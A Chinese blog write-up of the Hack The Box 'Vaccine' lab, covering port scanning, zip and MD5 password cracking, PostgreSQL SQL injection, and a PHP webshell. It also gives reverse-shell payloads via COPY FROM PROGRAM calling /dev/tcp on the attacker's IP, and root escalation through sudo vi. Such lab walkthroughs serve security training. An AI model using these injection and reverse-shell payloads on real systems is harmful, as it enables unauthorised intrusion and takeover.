hack the box vaccine 靶场练习

最新推荐文章于 2023-11-14 17:33:34 发布
最新推荐文章于 2023-11-14 17:33:34 发布
阅读量1.7k 收藏
点赞数 2
分类专栏: hack the box 文章标签: 网络安全 渗透测试 靶机 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rpsate/article/details/119305417
版权

收集信息

连接hack the box服务器后第一步依然是扫描靶机。

nmap -sV -sS -F 10.10.10.46

-sV 代表扫描端口和开放的服务信息

-sS 代表用TCP半开式扫描

-F 快速扫描,扫描常用的端口

在这里插入图片描述

发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。

ftp 10.10.10.46		//然后更具提示输入账号和密码
ls

在这里插入图片描述

发现了一个backup.zip,把它下载下来并解压。

如果被防火墙拦截则可以开启被动模式,详细了解被动模式可参考:https://www.cnblogs.com/yjf512/p/13206048.html

get backup.zip		//ftp下载文件
exit				//退出ftp程序
unzip backup.zip	//解压zip

在这里插入图片描述

发现解压需要密码。

获取密码

接下来我们来破解一下这个密码。

zip2john backup.zip>result
john result
john --show result

zip2john 是将在zip文件中提取密码密文,然后通过">"把这个密文写到文件result里面。

john 是将这个密文破解,但是破解后不会直接显示出来。

john --show result 这条命令是显示刚刚破解result的密码。

在图中我们可以看到这个zip的密码是 741852963

在这里插入图片描述

unzip backup.zip
vim index.php

解压后我们发现了两个文件,分别是: index.phpstyle.css,通过vim打开 index.php来分析一下代码。竟然发现登陆密码直接写在这个网页中,而没有在数据库中。很明显这个密码是通过了一次md5加密得到的。

在这里插入图片描述

把这个密文放到http://cmd5.com破解,很快,啪的一下的破解了,很明显是个弱口令。

在这里插入图片描述

获取shell

登陆后台,发现有一个搜索框。在这种有数据输入的地方要十分注意,很有可能是有漏洞的。输入一个单引号或双引号试一下,发现报错了,这说明该处有sql注入漏洞。

在这里插入图片描述

直接上sqlmap,但是发现sqlmap获取shell后网站变得奇慢无比,网站的打开速度也变慢了许多,和断了网似的,也不知道是什么原因,因此我们换一种方法。刚刚已经通过sqlmap得知这个网站采用的数据库是PostgreSQL version 11.5,该数据库有COPY命令可以利用,尝试写入一句话木马。

http://10.10.10.46/dashboard.php?search=1';COPY (select '<?php @eval($_GET[a]);?>') TO '/var/www/html/a.php';--

在这里插入图片描述

通过浏览器上显示的信息来看是权限不足,我们换一种方法。通过百度得知这有一个命令执行漏洞,类似于SQL server的xp_cmdshell,可以执行系统命令。为了建立反弹shell,首先在本地监听一个端口。

nc -lvnp 1234

-l 代表监听模式

-v 代表输出详细报告

-n 代表不执行DNS查询,如果使用的是域名就不能加入该参数

-p 指定端口号

然后再在浏览器上url栏的 http://10.10.10.46/dashboard.php?search='后面输入以下命令:

'; CREATE TABLE cmd_exec(cmd_output text); --
'; COPY cmd_exec FROM PROGRAM 'bash -c "bash -i &> /dev/tcp/10.10.14.116/1234 0>&1"'; --

第一句是创建一个表cmd_exec,用来接收执行的命令。

第二句是执行一段系统命令来建立反弹shell。

下面我们来详细分析一下这段建立反弹shell的命令

bash -c "bash -i &> /dev/tcp/10.10.14.116/1234 0>&1"

bash -c 代表用bash来执行一段命令,参数c后面加上一段需要执行的命令

bash -i 代表建立一个交互式的shell

> 这个我们经常见到,例如我们常用 echo “hello world”>hello.txt,这个代表将将字符串写入一个文件

那么&>又代表什么呢?我们先来了解一下shell中的三个文件描述符(file descriptor)。

0 是一个文件描述符,表示标准输入(stdin),即在shell中我们输入的字符。

1 是一个文件描述符,表示标准输出(stdout),即在shell中系统输出的字符。

2是一个文件描述符,表示标准错误(stderr),即shell中报错输出的字符。

在>前面的&代表文件描述符1和2,也就是标准输出和标准错误信息,这里是把交互式bash中的标准输出信息和报错信息都写入/dev/tcp/10.10.14.116/1234文件中。

这里的/dev/tcp是一个设备文件,并不是一个真正的文本文件。它的作用是建立tcp连接,在这里是与10.10.14.116的1234端口建立连接。

0>&1 这代表bash中的标准输入信息写入文件管道1(stdout),这里的&的意思与前面的不同,这里&与1是一个整体,&1代表文件描述符1(stdout)。而前面已经通过命令&>将文件管道1(stdout)的数据写入了/dev/tcp,所以这里的文件管道0的数据也会跟随文件管道1写入/dev/tcp。这样就将bash -i中的全部数据传输到了本地监听程序中,也就建立一个shell。

更详细的内容可以参考:

https://www.cnblogs.com/liuchaogege/p/6124669.html

https://zoresmile.cn/linux/2020/04/927.html

在这里插入图片描述

在这里插入图片描述

但是我们发现命令并没有执行成功。我们命令中的&变成了%,尝试转义符也没有成功。那我们不输入&,建立一个没有回显的反弹shell。注意在>前边有加一个0,需要穿点数据才能才能建立shell。

'; COPY cmd_exec FROM PROGRAM 'bash -c "bash -i 0> /dev/tcp/10.10.14.116/1234"'; --

选在反弹shell建立建立好了,但是没有回显,所以我们需要再建立一个有回显的反弹shell。首先新打开一个终端执行一下命令:

nc -lvnp 4443

然后在这个没有回显的shell中执行以下命令,看到监听终端中收到消息说明有回显的反弹shell建立成功。

bash -c "bash -i &> /dev/tcp/10.10.14.116/4443 0>&1"

占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符

在这里插入图片描述

来到网站目录/var/www/html查看一下有什么文件,查看一下dashboard.php,我们在这个文件里面发现了连接数据库的账号postgres和密码P@5w0rd!,经过测试这个正是当前该系统的用户名和密码。

占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符占位符

首先把shell升级成交互式shell。

SHELL=/bin/bash script -q /dev/null		//升级为交互式shell

SHELL是环境变量,它的值代表系统执行shell的文件位置。

script命令的原本作用是录制终端的会话过程,执行该命令后会运行一个新的shell,在此shell中执行命令的过程将会记录下来并保存在一个文件里面。这里执行script并不需要录制命令过程,我们需要的仅仅是它会运行一个新的shell。

-q 代表以静默方式运行一个新的shell,也就是说在后台运行一个新的shell。如果不加这个参数,则会弹出一个新的shell命令框。

/dev/null在这条命令中扮演的角色是保存script记录的文件,但是/dev/null一个特殊的设备文件,一切写入改文件的数据都会消失。我们不需要记录我们所执行的命令,所以将script所记录的内容指向该设备文件。

更详细内容可以参考:

https://www.xuexila.com/diannao/xitong/linux/3631993.html,linux的script命令

https://blog.csdn.net/longerzone/article/details/12948925,linux下的两个特殊文件——/dev/null 和 /dev/zero 简介及对比

提升权限

然后转到postgres账号,查看一下自己能以root权限运行哪些程序。

su postgres
sudo -l

在这里插入图片描述

我们发现postgres账号可以以root权限运行vi,在vi中是可以调用shell的。我们用root权限打开vi,然后再通过vi调用shell,这样这个shell也是以root权限运行。首先执行一下命令以root的权限打开vi。

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

然后按 进入命令模式,在命令模式下输入以下命令的其中一条即可:

!/bin/bash
!/bin/sh
shell

在vi/vim的命令模式下!加在命令后面表示强制执行,如果加在前边表示这是一条shell命令。以 !/bin/bash为例,这句命令表示以shell命令的方式执行 /bin/bash,也就是打开一个交互式终端。

在vi/vim的命令中,shell表示打开一个终端。

在这里插入图片描述

现在提权成功,可以在 /root/root.txt读取flage了。

参考文献

[1] https://www.linkedin.com/pulse/hack-box-starting-point-vaccine-nathan-barnes?trk=read_related_article-card_title,Hack the Box - Starting Point: Vaccine

[2] https://www.cnblogs.com/liuchaogege/p/6124669.html,shell 1>&2 2>&1 &>filename重定向的含义和区别

[3] https://zoresmile.cn/linux/2020/04/927.html,bash shell——bash -i >& /dev/tcp/192.168.174.128/9090 0>&1

[4] https://blog.csdn.net/Blood_Pupil/article/details/88795627,漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193)

[5] https://www.cnblogs.com/yjf512/p/13206048.html,ftp的passive模式

rpsate
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 1984
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
HackTheBox - Vaccine
qq_45862635的博客
06-17 921
Hack The Box :: Starting Point - Tier2 - Vaccine
HackTheBox-Vaccine
LYJ20010728的博客
07-27 542
HackTheBox-Vaccine连接配置信息搜集登录FTP破解压缩包密码获取登录密码登录网站getshell升级shell提权 连接配置 参考之前写的连接配置,文章链接 信息搜集 使用nmap对场景给出的ip地址进行扫描 nmap -sS -A 10.10.10.46 发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务 登录FTP ftp 10.10.10.46 Name:ftpuser Password:m
Hack The Box 之 10 Vaccine
Angelxiqi的博客
05-07 485
一如既往的详细,给个好评呗~~
HackTheBox-Starting Point--Tier 2---Vaccine
最新发布
七天
11-14 193
输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。2.FTP允许匿名登录,发现backup.zip。6.访问80端口,admin:qwerty789登录。7.搜索接口使用$searc变量,尝试对其进行注入。4.编辑pg_hba.conf获取shell。3.使用john解密backup.zip。4.backup.zip文件信息泄漏。爆破hash密码,得到密码是。,查看index.php,发现。参数获取一个shell。8.获取反弹shell。
The Anti-Vaxxer Vaccine-crx插件
04-03
语言:English (United States) 抗vaxxer疫苗是第一个数字疫苗,旨在在线对抗抗缅婆婆婆的传播。 抗vaxxerism几乎只有疫苗。 但它从未像今天那样毒力和危险,导致疫苗接种率下降,疾病爆发和死亡。...
Vaccine
03-17
标题中的“Vaccine”可能指的是一个使用C++编程语言开发的软件项目,它可能是为了模拟疫苗接种过程、管理疫苗库存或者预测疫苗分配等目的而创建的。在这个项目中,C++作为后端语言,提供了高效的数据处理和计算能力...
vaccine
03-08
入门首先,运行开发服务器: $ npm install$ npm run dev 用浏览器打开以查看结果。 您可以通过修改pages/index.js来开始编辑页面。 页面在您编辑文件时自动更新。 可以在上访问。 可以在pages/api/hello.js编辑此...
vaccine-system
04-05
"vaccine-system"是一个简单的疫苗管理系统,它利用了前端框架Vue.js进行开发。Vue.js是当前流行的轻量级JavaScript框架,以数据驱动和组件化为核心,使得构建用户界面变得更加便捷和高效。在这个项目中,我们可以...
hack the box靶场Vaccine靶机
zr1213159840的博客
03-23 3220
开启,看第一题: 问:除了跑了ssh和http服务,还有什么服务? 回答:ftp,使用nmap扫描,能看到结果 nmap -sV -Pn 10.129.95.174 第二个问题: 问:有一个服务时可以匿名登录的,用户名是什么? 回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous 并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。 说曹操曹操到,第三问 问:可以下载的文件
解决kali访问HackTheBox网络不稳定
peanut_trees的博客
07-07 2488
kali访问HackTheBox网络不稳定 HackTheBox作为一个靶场有着很多有意思的环境,官方推荐最好在虚拟机里搞,这里选择了kali,毕竟集成工具多,方便渗透。 Kali的网络可能会不稳定,解决办法如下: 修改ovpn文件 更改proto udp为proto tcp 更改remote {serverAddressHere} 1337为remote {serverAddressHere} 443 更改<tls-auth>为<tls-crypt> 更改</tls-auth
Hack the box vaccine
qq_41696858的博客
07-03 219
上一台靶机的线索FTP账号 ftpuser/mc@F1l3ZilL4 1.日常nmap -sC -sV 10.10.10.46,开放21,22,80端口 2.结合上一台靶机拿到的FTP账号,密码,登录FTP服务器,dir看到backup.zip,拿到备份文件 3.解密,用kali里面的john 先用zip2john backup.zip>hash //生成hash值,解密效率更高 john hash --fork=4 -w /usr/share/wordlists/rockyou.txt 2&gt
Hack The Box -----------------------Active
大方子
12-16 6917
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
Hack The Box : Starting Point - Vaccine
qq_60201815的博客
09-13 668
攻击机:kali-linux 靶机:Oopsie --------------------------------------------------------------------------------------------------------------------------------- 网络配置:操作与Archetype靶机相同,链接:Hack The Box : Starting Point - Archetype_丶 Chave的博客-CSDN博客 渗透过程 已知目标
0x03-HackTheBox-Shield
0pr
04-22 528
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 攻击者可以继...
hackbox
5L2g556F5ZWl77yf
05-15 1337
Archetype 得到一个SSIS(SQL Server Integration Services )配置文件,和账户密码 百度前辈解题步骤,SQLServer 身份验证方式为 操作系统身份验证 https://docs.microsoft.com/en-us/sql/integration-services/lesson-1-4-adding-package-configurations?view=sql-server-2017 通msf连接 开启xp_cmdshell exec sp_confi
linux终端设置es副本数,ES集群分片及副本调整
weixin_42514433的博客
05-11 1742
分片shardsES是个分布式的搜索引擎,所以索引通常都会分解成不同部分,而这些分布在不同节点的数据就是分片.ES自动管理和组织分片,并在必要的时候对分片数据进行再平衡分配副本replicas为了提升访问压力过大是单机无法处理所有请求的问题,Elasticsearch集群引入了副本策略replica。副本策略对index中的每个分片创建冗余的副本,处理查询时可以把这些副本当做主分片来对待(p...
hackthebox - Apocalyst (考点:cewl 生成字典 & 图片解密& wordpress & 修改/etc/passwd提权)
冬萍子癸水
05-29 375
1 扫描 常规22想到可能有ssh登录,80进网页搜集信息,扫描也提示了是wp博客 C:\root> nmap -A 10.10.10.46 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 20:21 EDT Nmap scan report for 10.10.10.46 Host is up (0.24s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION
靶机渗透_hackthebox__haystack -4
qq_34717555的博客
11-11 1305
获得靶机IP 10.10.10.115 nmap 扫一下 nmap -A IP 得到三个开放端口 Nmap scan report for bogon (10.10.10.115) Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open s...
install.packages("covid19vaccine") Warning in install.packages : package ‘covid19vaccine’ is not available for this version of R A version of this package for your version of R might be available elsewhere, see the ideas at怎么回事
06-12
这个错误提示意味着你正在尝试安装的R包"covid19vaccine"可能不适用于你当前的R版本。你可以尝试以下解决方法: 1. 检查你的R版本是否是最新的版本,如果不是,更新到最新版本。 2. 在CRAN...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rpsate

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值